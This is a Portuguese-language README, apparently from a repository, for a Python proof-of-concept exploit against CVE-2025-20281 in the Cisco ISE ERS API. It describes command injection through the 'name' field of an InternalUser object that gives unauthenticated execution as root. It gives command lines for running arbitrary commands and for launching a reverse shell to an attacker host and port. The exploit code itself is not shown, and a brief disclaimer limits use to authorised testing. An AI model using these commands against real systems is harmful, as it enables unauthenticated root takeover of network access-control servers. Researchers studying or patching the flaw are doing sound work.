
Exploit de execução remota de código não autenticada para CVE-2025-20281 no Cisco ISE ERS API. Execute comandos ou lance shells reversas como root — nenhuma autenticação é necessária.
Este repositório contém um exploit de prova de conceito em Python 3 para CVE-2025-20281, uma vulnerabilidade crítica no Cisco Identity Services Engine (ISE) que permite execução remota de código (RCE) não autenticada como root por meio da API ERS.
O endpoint
/ers/sdk#_da API ERS do Cisco ISE falha ao validar a autenticação ao processar solicitações de criação de usuários.
Ao injetar comandos de shell no parâmetronamedo objetoInternalUser, os atacantes podem obter execução de comandos como root.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Comando de teste:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Executar comando personalizado:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Shell reverso:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ Aviso Legal
Este código é fornecido apenas para fins educacionais e de testes autorizados. Não use este software contra redes ou sistemas que você não possui ou para os quais não tem permissão para testar.
Vulnerabilidade: Divulgada por meio do advisory da Cisco
Refatoração do PoC: illdeed